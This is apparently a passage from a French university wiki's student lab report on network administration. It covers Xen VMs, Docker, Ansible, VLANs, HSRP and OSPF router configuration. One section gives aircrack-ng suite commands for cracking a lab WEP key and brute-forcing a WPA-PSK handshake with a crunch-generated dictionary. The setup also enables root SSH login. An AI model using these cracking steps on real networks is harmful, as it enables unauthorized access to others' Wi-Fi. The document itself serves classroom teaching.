 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52021</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52021"/>
				<updated>2020-01-05T16:01:38Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Création des Réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
